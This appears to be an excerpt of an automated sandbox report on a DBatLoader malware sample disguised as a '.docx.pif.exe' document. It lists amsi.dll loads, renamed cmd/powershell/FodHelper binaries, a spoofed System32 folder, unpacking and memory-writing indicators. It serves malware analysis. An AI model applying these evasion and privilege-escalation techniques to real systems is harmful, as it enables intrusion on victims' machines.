              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: C:\Users\Public\xkn.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows \System32\per.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeStatic file information: File size 1085440 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\Public\Libraries\drbdmeyP.pifUnpacked PE file: 3.2.drbdmeyP.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;
              Detected unpacking (creates a PE file in dynamic memory)
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeUnpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack
              Yara detected DBatLoader
              Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: drbdmeyP.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02997CC8
              Source: alpha.exe.6.drStatic PE information: section name: .didat
              Source: per.exe.18.drStatic PE information: section name: .imrsiv
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029832FC push eax; ret 0_2_02983338
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029AA2FC push 029AA367h; ret 0_2_029AA35F
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299D2E4 push ecx; mov dword ptr [esp], edx0_2_0299D2E9
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298635A push 029863B7h; ret 0_2_029863AF
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0298635C push 029863B7h; ret 0_2_029863AF
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029AA0AC push 029AA125h; ret 0_2_029AA11D
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029AA1F8 push 029AA288h; ret 0_2_029AA280
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029AA144 push 029AA1ECh; ret 0_2_029AA1E4
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02986748 push 0298678Ah; ret 0_2_02986782
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02986746 push 0298678Ah; ret 0_2_02986782
